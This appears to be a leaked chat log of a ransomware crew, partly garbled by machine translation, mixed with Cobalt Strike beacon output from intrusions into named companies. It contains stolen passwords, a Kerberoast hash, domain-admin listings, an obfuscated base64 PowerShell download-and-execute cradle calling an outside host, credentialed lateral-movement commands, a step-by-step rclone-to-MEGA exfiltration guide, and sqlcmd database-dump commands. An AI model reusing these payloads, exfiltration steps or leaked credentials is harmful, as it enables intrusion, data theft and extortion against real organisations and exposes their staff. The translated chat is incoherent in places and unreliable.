CtxCeipSvc.exe 2064 Services 0 8,804 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
CpSvc.exe 2156 Services 0 35,064 KB NT AUTHORITY\LOCAL SERVICE 0:17:06
CtxAppVService.exe 2464 Services 0 45,288 KB NT AUTHORITY\SYSTEM 0:00:00
CtxSvcHost.exe 2428 Services 0 9,856 KB NT AUTHORITY\LOCAL SERVICE 0:00:04
CtxSvcHost.exe 2684 Services 0 8,204 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
WebSocketService.exe 532 Services 0 9,924 KB NT AUTHORITY\SYSTEM 0:00:01
CtxSvcHost.exe 1016 Services 0 8,096 KB NT AUTHORITY\LOCAL SERVICE 0:00:01
CtxSvcHost.exe 912 Services 0 7,536 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
CtxSvcHost.exe 392 Services 0 12,740 KB NT AUTHORITY\LOCAL SERVICE 0:00:42
macmnsvc.exe 988 Services 0 12,816 KB NT AUTHORITY\LOCAL SERVICE 0:00:13
masvc.exe 1128 Services 0 28,904 KB NT AUTHORITY\LOCAL SERVICE 0:03:42
CtxSvcHost.exe 2764 Services 0 7,372 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
SCService64.exe 2656 Services 0 23,728 KB NT AUTHORITY\NETWORK SERVICE 0:00:17
svchost.exe 2516 Services 0 40,968 KB NT AUTHORITY\NETWORK SERVICE 0:48:48
SemsService.exe 2872 Services 0 39,660 KB NT AUTHORITY\LOCAL SERVICE 0:02:54
ImaAdvanceSrv64.exe 3192 Services 0 8,708 KB NT AUTHORITY\SYSTEM 0:00:18
macompatsvc.exe 3968 Services 0 15,224 KB NT AUTHORITY\SYSTEM 0:00:12
mfemactl.exe 3164 Services 0 8,196 KB NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2844 Services 0 11,260 KB NT AUTHORITY\SYSTEM 0:01:11
svchost.exe 4108 Services 0 7,728 KB NT AUTHORITY\NETWORK SERVICE 0:00:02
TelemetryService.exe 3092 Services 0 69,936 KB NT SERVICE\CitrixTelemetryService 0:00:08
AotListener.exe 2040 Services 0 25,312 KB NT SERVICE\CitrixTelemetryService 0:00:00
conhost.exe 4584 Services 0 6,008 KB NT SERVICE\CitrixTelemetryService 0:00:00
VSSVC.exe 3892 Services 0 9,224 KB NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 3720 Services 0 9,652 KB NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 2932 Services 0 6,780 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
mctelsvc.exe 428 Services 0 15,404 KB NT AUTHORITY\SYSTEM 0:00:03
CloudamizeWatchdog.exe 4036 Services 0 44,692 KB NT AUTHORITY\SYSTEM 0:01:43
csrss.exe 4132 Console 2 3,928 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 2172 Console 2 10,192 KB NT AUTHORITY\SYSTEM 0:00:00
logonUI.exe 2452 Console 2 28,604 KB NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 3076 Console 2 27,300 KB Window Manager\DWM-2 0:00:00
WmiPrvSE.exe 13236 Services 0 36,596 KB NT AUTHORITY\SYSTEM 0:58:13
WmiPrvSE.exe 1288 Services 0 24,688 KB NT AUTHORITY\LOCAL SERVICE 0:01:42
WmiPrvSE.exe 11844 Services 0 12,904 KB NT AUTHORITY\NETWORK SERVICE 0:02:52
csrss.exe 10104 ICA-CGP#13 108 12,360 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 12108 ICA-CGP#13 108 13,176 KB NT AUTHORITY\SYSTEM 0:00:06
dwm.exe 11816 ICA-CGP#13 108 38,720 KB Window Manager\DWM-108 0:00:01
ctxgfx.exe 8400 ICA-CGP#13 108 26,860 KB NT AUTHORITY\SYSTEM 0:00:01
taskhostex.exe 10436 ICA-CGP#13 108 9,088 KB CORP\jvelazquezg 0:00:00
icak2meng.exe 12952 ICA-CGP#13 108 7,344 KB NT AUTHORITY\SYSTEM 0:00:00
wfshell.exe 9128 ICA-CGP#13 108 21,312 KB CORP\jvelazquezg 0:00:00
CtxMtHost.exe 8132 ICA-CGP#13 108 8,584 KB CORP\jvelazquezg 0:00:00
SptEddss.exe 4080 ICA-CGP#13 108 38,776 KB CORP\jvelazquezg 0:00:14
DirectorComServer.exe 12256 ICA-CGP#13 108 21,836 KB CORP\jvelazquezg 0:00:00
csrss.exe 10924 ICA-CGP#14 120 8,728 KB NT AUTHORITY\SYSTEM 0:00:03
winlogon.exe 12836 ICA-CGP#14 120 13,232 KB NT AUTHORITY\SYSTEM 0:00:01
dwm.exe 1860 ICA-CGP#14 120 37,976 KB Window Manager\DWM-120 0:00:02
ctxgfx.exe 9544 ICA-CGP#14 120 46,704 KB NT AUTHORITY\SYSTEM 0:00:06
icak2meng.exe 8960 ICA-CGP#14 120 7,344 KB NT AUTHORITY\SYSTEM 0:00:00
taskhostex.exe 2036 ICA-CGP#14 120 9,016 KB CORP\lvegar 0:00:00
wfshell.exe 13040 ICA-CGP#14 120 20,920 KB CORP\lvegar 0:00:00
DirectorComServer.exe 13264 ICA-CGP#14 120 21,900 KB CORP\lvegar 0:00:00
CtxMtHost.exe 9096 ICA-CGP#14 120 8,576 KB CORP\lvegar 0:00:00
PgmCtl32.exe 1720 ICA-CGP#14 120 71,376 KB CORP\lvegar 0:01:56
TitleMan.exe 12948 ICA-CGP#14 120 33,388 KB CORP\lvegar 0:00:01
WmiPrvSE.exe 11700 Services 0 13,344 KB NT AUTHORITY\NETWORK SERVICE 0:00:05
csrss.exe 580 ICA-CGP#113 77 8,312 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 4428 ICA-CGP#113 77 13,208 KB NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 3736 ICA-CGP#113 77 29,288 KB Window Manager\DWM-77 0:00:00
ctxgfx.exe 9272 ICA-CGP#113 77 26,384 KB NT AUTHORITY\SYSTEM 0:00:00
icak2meng.exe 12472 ICA-CGP#113 77 7,300 KB NT AUTHORITY\SYSTEM 0:00:00
wfshell.exe 12764 ICA-CGP#113 77 21,344 KB FILIAL\Anavarretea 0:00:00
CtxMtHost.exe 600 ICA-CGP#113 77 8,580 KB FILIAL\Anavarretea 0:00:00
Accounts.exe 3824 ICA-CGP#113 77 32,612 KB FILIAL\Anavarretea 0:00:13
taskhostex.exe 12336 ICA-CGP#113 77 8,968 KB FILIAL\Anavarretea 0:00:00
DirectorComServer.exe 6428 ICA-CGP#113 77 21,860 KB FILIAL\Anavarretea 0:00:00
csrss.exe 9464 ICA-CGP#115 38 8,640 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 5088 ICA-CGP#115 38 13,196 KB NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 9640 ICA-CGP#115 38 29,636 KB Window Manager\DWM-38 0:00:00
ctxgfx.exe 456 ICA-CGP#115 38 35,472 KB NT AUTHORITY\SYSTEM 0:00:00
icak2meng.exe 10760 ICA-CGP#115 38 7,332 KB NT AUTHORITY\SYSTEM 0:00:00
taskhostex.exe 9872 ICA-CGP#115 38 8,988 KB CORP\pbsilvalo 0:00:00
wfshell.exe 6504 ICA-CGP#115 38 20,820 KB CORP\pbsilvalo 0:00:00
CtxMtHost.exe 8168 ICA-CGP#115 38 8,588 KB CORP\pbsilvalo 0:00:00
PgmCtl32.exe 8600 ICA-CGP#115 38 66,664 KB CORP\pbsilvalo 0:00:10
DirectorComServer.exe 4588 ICA-CGP#115 38 21,900 KB CORP\pbsilvalo 0:00:00
TitleMan.exe 11740 ICA-CGP#115 38 33,332 KB CORP\pbsilvalo 0:00:01
SptEddss.exe 9260 ICA-CGP#13 108 35,328 KB CORP\jvelazquezg 0:00:05
rundll32.exe 7884 Services 0 11,312 KB NT AUTHORITY\SYSTEM 0:00:00
rundll32.exe 5968 Services 0 11,336 KB NT AUTHORITY\SYSTEM 0:00:00
powershell.exe 10816 Services 0 91,076 KB NT AUTHORITY\SYSTEM 0:00:01
conhost.exe 12992 Services 0 6,172 KB NT AUTHORITY\SYSTEM 0:00:00
powershell.exe 10928 Services 0 52,624 KB NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 4548 Services 0 5,940 KB NT AUTHORITY\SYSTEM 0:00:00

```
something does not draw the car@user7 then work here ``
User : NT AUTHORITY\SYSTEM
Window : Conexión - Internet Explorer
Time : 2021-01-28 09:36:38 a. m.
LogFile : WireTap.log
----------------------------------------------
hgutie<Tab>
[+] received output:
73HILArioge=<Enter>
Just like a peep in the eye.
TrGUI
=======
R8WTksIOle1rP8)P
253758
```
vpn``.
 202B fil 09/23/2020 16:25:07 pas.txt
 903.2KB fil 09/21/2020 14:59:51 seatinfo.txt
```
and files left)I won't repeat any more where the hashtag format ```
[*] Tasked beacon to psinject: invoke-kerberoast | fl into 508 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:


TicketByteHexStream :
Hash : $krb5tgs$host/STS.GPJ.COM:922009E476DEA5700F2E695715EB812D$BBDE017D99D5497CE
                       797629897A1BB4D09635DFB86D65E6160D4621FBA14E553D40768D8BA73B20B3F05D38D6923B
                       EECFC23FEDCEE7912A886169F781DD5B971C84C7257CC762FC68DC441B223CEDC016A618C77C
                       945CB23E574F4702C3702B6E0084402019F26DB11FCFFDECE625BEAA8E0086A58C51908C3A3F
                       AE656EC95B9AF00A9DBF850490CADDAEE02909EF657CA8F5E0C255D1C79692241553BA8E34A6
                       B37338A20514096F85E4D17D1A9A89CDA43E330FDC148F0725E09FCD6DE661825F314453418D
                       18727C89D113CDF8947072CF4C7CC9850070DC0FC7D4F8B5F13AB16151ADB36DA6BB761D5A78
                       43608AD6D5EB683D03AE6F2B29849FF8FC9AC0472CB4F51BE206FF7BAC9AA67F4ACB438C0149
                       332A88A39AB66541EE018FCF4F0859A69C07FD06A7D0FC3B736D393575ACF1B1548E4EF03C11
                       6C0BD49F66561D08B251D999ACC8AD7B087A818A2B329A83EBF9FE912D6C04D25E7B2DE93709
                       0B10D3DCAC2B606265939967B1164EC63CD582B5F71128DF194A57C750015691F6AB7A5481C1
                       75033CF61337046E2B253A55A92F21D5A444BE94657FD25DBE868ABFBCD9F2E70DAAD7814D18
                       49CDEE2EAC0BFF9E4748C3976AF7B573C97F269F84C400605591CD357FB76BF94D2301DB76A4
                       8612FCCE2C1D0B11F68481B741CBB52B55F4A6F6C4F3DE454E19A4AE41E31E5032940C1C6119
                       0A0582C179633B1AF2261148D439A356710E33CE603FEC87770775FD1060F0A5DBC510598AC2
                       344ACFCC2ED05AFA1BAF861A14B18ADABE70DBA7AD73A51EEF91273ADFE6CFBC21823F38B9C6
                       22E1066884E74A5BA7012FF4F4CE1BFF4CAC6B9C032B8B2758232528F584D95E9B6CA0730F35
                       2780FCDB09E30769F6F7CBD101EAC32AC1FB6F544B2F85D54CE397F8FE8C664ADE59F8887E09
                       7FF9B57FFEADFCEF80BE932707EC1B5251D3222B22AFEB43F3ACD3F1AA42B9E267AC8EF62FD1
                       183DC38BD0570F7E70E4E2A7BFA3467FE79257156B34B952843BB9A4C7ED04ED2053DA281010
                       FAFD17BAE5C73DE59C3B1A63A6AF7B55C826278E1FEDB1EEABE7B13F4AC8D23A44135E98534E
                       49DC204D5EE45C8B29E74F1B94FE37F64DD0C08D7E60C1688859024754E8BD7B25ED523AE177
                       3FB86C6FDEF53C34D302E3E95E7F338B1169AA7CC20791AC2C678D2F407C9821F2B0C028D3F0
                       2F5CF63EED2F9906B1EEFD7B068873DB53C7D02CFB58DB64B13A2F67FD37F5601965243564D8
                       390D00BA481B5CB599DBF95D0BC34A60BCBA0914378F308F170A4C205C3EE62B0A2F0ED098C1
                       94C7E03129D489261CE4472666798914D2E04040FD1BE0D3FA173609AEB28B5C521BCD10F36D
                       A9CED3A0730C1351435C8C0940F6206BE432CC772B3CB8B8DFE91129D41A9324496BE689DBB0
                       3564AC936542D1B52B9B6D8C93113AB54BFFE0FCF353E49A6E09E0A479F85449A362C698FA9B
                       C847F4B395ECEDCC68046229877571B8CCA6CF3C681E8A570BE696722AB590B91A4B46599FD2
                       32AE2ACDF9272E3D64CD8ADF4DA0BF6FA411945145FB061C4BF72136CF970453A93D09CFBEDE
                       7EDB8266750800A178D6B604C05A1900EB599D176276BB02CACA86E54BB74A0955C7D7663A40
                       806069F1E62DFB33ED8F254F8618A23113FA409F6366CD94EBB9DB444F80D1C1C94E8777E2E8
                       23CD8DCEDDD31579B4D5DDA2A120B2E14E83351428CB6C431D726FC28CAA8C0686C57D919950
                       48EFD911A7C98DF81B9F2C47062E3C1BF14F183CD1ECD1CCBA97AB143BE8D1A86F7F0F809A38
                       E9BC6F2BC612FFDDC845053FCFABE6F482214E57AD7FEE71960B84BCCD41BB5950D2C967E3DE
                       F10AEFF3C5FEB106CE5B19C4DCCA7E5FE148B0879CBAF5A5828592D82F8C09AE54E9005C92A9
                       677FA59B87EB3E9FF753CFB6EF022E272B1B064090A9AF0DD281A332AA5AB21E3B01024840D0
                       87C912B42B869198FB579E81CF8FF8E6F
SamAccountName : Pwwadfssvc
DistinguishedName : CN=PwwAdfs Svc,OU=Users,OU=AuthManagement,DC=gpj,DC=loc
ServicePrincipalName : host/STS.GPJ.COM

``````
[RESULT] Username: Administrator (built-in)
[RESULT] Changed: 2015-06-29 09:18:32
[RESULT] Password: DdhGmek/pc
[RESULT] Username: install
[RESULT] Changed: 2015-06-29 09:46:46
[RESULT] Password: rt/98740/pc
[RESULT] Username: Lack
[RESULT] Changed: 2014-10-06 09:45:54
[RESULT] Password: RT+farbe

if there is time to work with the nessession arrived)ah, then delete all but one dead ones with a ping in a few hoursdid you have dead ones if there are[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=XSDfk8yFdwtBYX9dF) ?with you what happens to mine?ok, go back to the other 14 tasks closed without a note? great) in the root of the rdmi appeared) ok if there will be rdmi then ok try to run dlla 17 will not work? ok take a secondary server with a session to 15 makstam so much? if more than 10 is ok? all mapping or whatever? no i just picked up disks ts. I'll check if the balls are done? + in short, I'll work in a shared coba, maybe delete 50? it looks like I have a problem with the coba. run a dll from a user7 to him the session flew. he tried to throw it to me - no luck. then he threw it in the coba, where we get sessions today. I tried to dump it on myself - again no luck. I restarted cobalt at 7 o'clock. I'll try the others. I went in order and stopped at the first one and masked the rest.no use, llvm and both checkboxes checked - no session anyway, i made a dll in bilder, it copied, i ran it, it disappeared, but no session...i'll give you access to bilderado dll maybe better, mine will not raise sessionokeid.bild left? ok, let's do[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=3wWnzihjHwbAKDKm7) maybe it is. stalin says "hz" ``
Volume in drive \10.0.61.17\c$ has no label.
 Volume Serial Number is F476-EA6A

 Directory of \10.0.61.17\c$

08/22/2013 08:52 AM <DIR> PerfLogs
12/08/2020 05:22 PM 204,192 pl64.dll
03/29/2019 01:30 PM <DIR> Program Files
12/09/2020 07:42 AM <DIR> Program Files (x86)
12/09/2020 08:06 AM 42,606,592 redcloak.msi
03/06/2015 10:26 AM <DIR> sysprep
06/13/2019 02:08 PM <DIR> Users
07/25/2020 07:12 PM <DIR> Windows
10/26/2018 12:36 PM <DIR> Zabbix_Agent
``but I don't see a note in these, ok, the dll could have stayed since the sessions were from a process and the dll can't be killed```
 Volume in drive \10.0.61.87\c$ has no label.
 Volume Serial Number is 6847-A1AE

 Directory of \10.0.61.87\c$

09/14/2012 12:22 PM 5,210,976 445622_intl_x64_zip.exe
03/23/2016 01:35 PM 1,435,680 adksetup(1).exe
06/03/2011 12:54 PM 119 FIREWALL
12/10/2020 07:07 AM 0 KBSERVICE.SHUTDOWN
06/03/2011 01:10 PM 924,544 keyManagementServiceHost.exe
11/19/2014 04:57 PM 434,152 office2013volumelicensepack_x86_en-us.exe
07/13/2009 07:34 PM <DIR> PerfLogs
12/08/2020 05:37 PM 0 pl64.dll
03/29/2019 01:30 PM <DIR> Program Files
01/16/2018 04:10 PM <DIR> Program Files (x86)
05/21/2020 09:53 AM <DIR> Users
01/14/2019 11:33 AM <DIR> Win7AndW2K8R2-KB3191566-x64
12/08/2020 06:34 PM <DIR> Windows
07/02/2012 02:32 AM 5,084,750 Windows6.1-KB2691586-v9-x64.msu
10/21/2013 12:45 PM 7,769,979 Windows6.1-KB2885698-x64.msu
10/29/2018 02:49 PM <DIR> Zabbix_Agent
``````
 Directory of \10.0.50.71\c$

08/03/2017 01:19 PM <DIR> B5465 P639 Firmware
08/03/2017 01:18 PM 223,498,304 B5465 P639 Firmware.zip
11/03/2017 09:55 AM <DIR> batch
08/17/2017 01:43 PM <DIR> Canon_backups
09/12/2016 04:34 AM <DIR> logs
02/24/2018 06:04 AM <DIR> PerfLogs
12/08/2020 05:19 PM 204,192 pl64.dll
11/03/2017 09:58 AM <DIR> Printer_Exports
03/29/2019 01:29 PM <DIR> Program Files
12/09/2020 02:51 PM <DIR> Program Files (x86)
10/24/2016 07:12 AM <DIR> sysprep
10/05/2020 02:13 PM <DIR> Users
11/21/2020 08:29 PM <DIR> Windows
10/26/2018 08:11 AM <DIR> Zabbix_Agent
07/16/2018 01:39 AM 2,423 __PatchLink0026.cab
``````
 Volume in drive\10.0.61.117\c$ has no label.
 Volume Serial Number is D242-6D7F

 Directory of \10.0.61.117$

11/01/2016 10:32 AM 7,789,336 ControlNowAgentSetup.exe
09/12/2016 04:34 AM <DIR> Logs
05/28/2018 02:16 AM <DIR> PerfLogs
12/08/2020 05:18 PM 204,192 pl64.dll
03/29/2019 05:54 PM <DIR> Program Files
12/09/2020 10:18 AM <DIR> Program Files (x86)
12/09/2020 08:06 AM 42,606,592 redcloak.msi
10/26/2017 01:43 PM <DIR> sysprep
01/29/2019 04:13 PM <DIR> Users
11/22/2020 08:30 PM <DIR> Windows
10/26/2018 09:41 AM <DIR> Zabbix_Agent
               3 File(s) 50,600,120 bytes
               8 Dir(s) 82,381,557,760 bytes free
``at the root of....``
12/08/2020 05:01 PM 204,192 pl64.dll
``dll remained+either raised or not attracted. let me ask stalin - his server was ``SHAREP-WEB1: 10.0.61.53
 Volume in drive \10.0.61.53\c$ has no label.
 Volume Serial Number is F476-EA6A

 Directory of \10.0.61.53\c$

02/09/2015 11:34 AM <DIR> inetpub
08/22/2013 08:52 AM <DIR> PerfLogs
12/08/2020 05:01 PM 204,192 pl64.dll
03/29/2019 05:54 PM <DIR> Program Files
10/08/2019 10:19 AM <DIR> Program Files (x86)
02/11/2015 09:59 AM <DIR> root
02/05/2015 09:42 AM <DIR> sysprep
05/24/2017 01:29 PM <DIR> Users
07/26/2020 07:12 PM <DIR> Windows
               1 File(s) 204,192 bytes
               8 Dir(s) 68,786,823,168 bytes free
``[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=ufef3u2v4oequfuwE) ok[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=jukNHRbyzyYWcqAZ2) there's nothing on these servers at all, no ball or disk from all serversdid you get them all? and take them off in general \host\c$ I'll check this dir \\\host\c$\readme.txt >> report.txt returned files
10.0.53.58
""
10.0.51.45
""
10.0.254.22
""
10.0.53.57
""
10.0.53.54
""
10.0.61.54
""
10.0.53.53
""
10.0.53.56
""
10.0.61.86
```
there's no balloon here? and it's being reportered on the 174 servers nowgm, right now) run it under the admin and change the host in a loop or something like thatmake a batkin with a loop in it
dir \\host\\c$/readme.txt >> report.txt If you manually go through 200 servers, you'll get boredFINIIS1 - pings on nothing opensMANITOU - note thereADMINDC5 - note thereADM-RADIUS1 - note thereESPAPP3 - does not respond `` ``
The request will be processed at a domain controller for domain main.crispregional.org.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator Allscripts_Admin allscripts_services
AllscriptsSQL amhs-admin ashleys
blove dragon helpdesk
htservice jwashburn1 MBAM-RW-SVC
meditech meditech-admin mhiers
nodom pbodrey rlagrone
rthomas smaxwell spf_svcs
tcoppedge
The command completed successfully.


[+] received output:
The request will be processed at a domain controller for domain main.crispregional.org.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator rthomas
The command completed successfully.


[+] received output:
The request will be processed at a domain controller for domain main.crispregional.org.

Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
braccosupport
Domain Admins
meditech
meditech-admin

The command completed successfully.


beacon> shell net localgroup "administrators"
[*] Tasked beacon to run: net localgroup "administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
admin
Administrator
MAIN\Domain Admins
The command completed successfully.

``Then throw the actual information in the confab, so that everything was in front of my eyes, no, not yet? Yes, I'm still doping armas. So we'll start soon. So what.octamovemovement wentprinjoin @user8 still, still quietly put ``
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JENsemx0NFpld2U2bXI0ZTJMRTlkdzllRUNFSkhiUmxZY0NFPTA7CiRfaWQ9J1IzUFgzMmNkVmNIRE1IODd2MzBURWRXallaQTl2SzhWVlJpUjN6dVUnOwokX3VybD0naHR0cDovL3dpZGVpby5jb20vYXNzZXRzL2Nzcy9ib290c3RyYXAubWluLmNzcyc7CnNsZWVwIDEyOwokc3N3ID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuU3RvcHdhdGNoOwokZWMgPSAkZXJyb3IuY291bnQ7CmZ1bmN0aW9uIGI2NGUgKCRzdHIpIHtpZiAoISRzdHIpIHsgJHN0ciA9ICcnIH07cmV0dXJuIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkc3RyKSk7fQpmdW5jdGlvbiBiNjRkICgkc3RyKSB7cmV0dXJuIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHN0cikpfQpmdW5jdGlvbiBzcHIoJGEsICRwcykgewokV0MgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50Owokd2MuSGVhZGVycy5BZGQoJ2FsdC1zdmMnLCAibWE9JChHZXQtUmFuZG9tIC1NaW5pbXVtIC05ODc2NTQzIC1NYXhpbXVtIDk4NzY1NDMpLGgxLVEkKEdldC1SYW5kb20gLU1pbmltdW0gMTAwIC1NYXhpbXVtIDkwMCk9YCI6JChHZXQtUmFuZG9tIC1NaW5pbXVtIDQwMCAtTWF4aW11bSAxMDAwKWAiOyBtYT0kKEdldC1SYW5kb20gLU1pbmltdW0gLTk4NzY1NDMgLU1heGltdW0gOTg3NjU0MykiKTsKJHdjLk
``full''
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANgAwADgAaQBzADEAVABLAEUANgA5AHIAegBDAEgAdQB4AEQAOABBAFAAbABXAEUAUQBWAG0ATABJAHEAbwBmAFYASwBkAG8AMQBhADcAawAnACkAKQA7AA==
Give me a load of the stuff you don't have...put the dlluwas supposed to be there yet. did it come?[ ](https://mediaeveryone.com/channel/general?msg=2K7rdb6f6WThpRqdB) ok if it doesn't come in 30 min, you'll write 30 min. put@user4 give me more silk code[ ](https://mediaeveryone.com/channel/general?msg=tXPbfeLk4E8h253QE) add me to the confutaq still 1 help @user8 he has a fat network there would not want to lose it, build a dll from kobyzhivoy there) my it?TomHolzerFordwhat's his? ask my guys if it's theirs. I'll tell you what's mine... I'm confused, yours is not)((I mean @user4)
urlbig.com:443vrue, found yours now give others do not exist think about how you'll act just run your eyes over the Mapuhoto not worthwhile@user9 write out a plan to close by roadmap7[ ](https://mediaeveryone.com/channel/general?msg=R3BrByJd5Xknit5Jx) under whom? which did not have time? if so, then the conf is not me yesterday there was another - ballymoregroup.com if you can get it back, I can continue with it, or user8 help with 26 trustsconf under it there was another one, but it almost immediately offsolved - did not have time[ ](https://mediaeveryone.com/channel/general?msg=vr32eeF23pzvdXTJo) heremb I will now launch you there in general those with whom I workedwill see what to give me)no. but for today, yes)are you done with him? no. we were here with the router again poking around and you started at 6?[ ](https://mediaeveryone.com/channel/general?msg=9pJzNgC67kaNguRSm) writing, yesterday the last one at the end of the day went to the offethese means to sit idle?there is no active guys, I'm not a telepath, if you sit without work write write that people are working in the input sessions who like yesterday are still dead why sit silently I also do not have a live in the input cobb is there new? or after 3 am or until 6 pm you know the timing in my grid kst only 8 am @user9 if finished take another network to work) ah) I will throw there and build before closing) so ah close.we are not closing now why? @tl1 add us to @user9 in the confab, if it's not difficultselfspin.com sorting of servers and other information in the confab.hiB corbel.com all ready for closure then the plan for today is: 2 people who have already taken YES work in the same networks and preparing to close, the rest while lifting the rightsDa, but not all came up All alive, in sound mind and health?HiTo all helloDa)morninG) to all goodnightTo all without misunderstandingTomorrow i.e. todayHappyTo all until tomorrow)hopefully in the eveningTo 6 khoroshoda, two?without "probably a normal grid" right? total 2 networks with Dada, also Dada and dll running `MM-LIB` host where the dll stuck rolling check and then staskun at the stage of work with vpnom it was in lrhstuck and did not solve[ ](https://mediaeveryone.com/channel/general?msg=Xj8qmsWoqKomTqCah) how did you solve?give the hostname also yes and dll is running? well i had at least so it was somysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysm's was there yes, looking for edtam xp) ohohohojitwinds you ten tomorrow will solve these cases get such ``
beacon> shell net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[*] Tasked beacon to run: net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[+] host called home, sent: 95 bytes
[+] received output:
System error 384 has occurred.

You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747

``boys are part of a group of hp adminstrusts will scour tomorrow in the current one or trastaherstech.com, fishusa.com, holzerford.com - removed adinfo, kerbs, EA YES. all sessions are off.this is wherealloypolymers.com
>description: password rbuilder
>description: Generic GroupWise account for Adhesives.  Password - pword
>description: Password is pword.
>description: Pword-flas21a. Deco 1
>description: The password is waglobal2014 Password does not expire
>description: For Trackit SQL passqord is trackit114
>description: The service account for DCWAS08 Execel Password is VantgagePoint
``@user8 here's some food for thought for tomorrow if the session doesn't die[ ](https://mediaeveryone.com/channel/general?msg=A24quWh36NdPwR2Px) COGNOSPD.korbel.com
dcsync was taken off, maybe the lab, now in slip, waiting for commands
 
`wilsonart.com'.
28 trusts, minus duplicates and quarantines - 7
7 trusts removed from hell, two trusts and the current domain removed from the kerbs@user9 say his hostnamecorbel.com
There is a YES
run the dll on the far server
found sphere and creeds
found edr and krediSnatched the AD, lifted the system, no kredi to move on, with nyah kerb kredi given for decryption.are there dll running on the servers and so yes to me exactly the network interests with YES which we will close tomorrowwrite reports on workMany of 2826 trusts)are you many left?+++ alive? you about the zealot do not forget? my keyloggers empty (there is nothing empty) they just work with shul and sometimes write to each other keyloggers have not checked? yes shul there all in #waterway-com uploading backups mail finance admins + deal with shul so what do you have?so the sooner we check everything for tomorrow the sooner we go to bedtoday we're closing 2 grids so the sooner we work the sooner you go hometodaytodaytodaytodaytodaytodaytoday by 6 and today we need to prepare everything for tomorrow i understand you're tiredtodaytoday we're closing the rt or till 00 work @tl2 @tl1 same, backups in water what are you busy doing?i did not try it, that's why i wrote it like with rdp)) try it without rdp? it pours very fast because of the high compression
now there is no need for any 7za and unzipping the mega! everything is very quiet and unnoticeable!

download rclon from the off-site. rclon.exe put it in the right directory, then everything according to the manual. I did everything through the rdp
You register a mega, choose it from a huge list, which rclon provides us. rclon quietly connects to the mega and makes a clone of what you need. you can at least the whole fs. it downloads everything through rclon, so the download speed is high.

Here's the guide. It's simple
https://rclone.org/mega/

next command to download

rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

remote:NT - change only this.
"remote" is the name of your mega.
"NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself.

example

rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
``https://rclone.org/если requires some amount of data to be uploaded''.
8. Backup database
sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'"


for remote/other local server change localhost to ip,port
alternatively localhost,%port% (see netstat)
``````
7. Output all tables of a specific database
sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W
``````
with size in megabytes
sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"

``````
1. Display all databases on the server in kmd
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
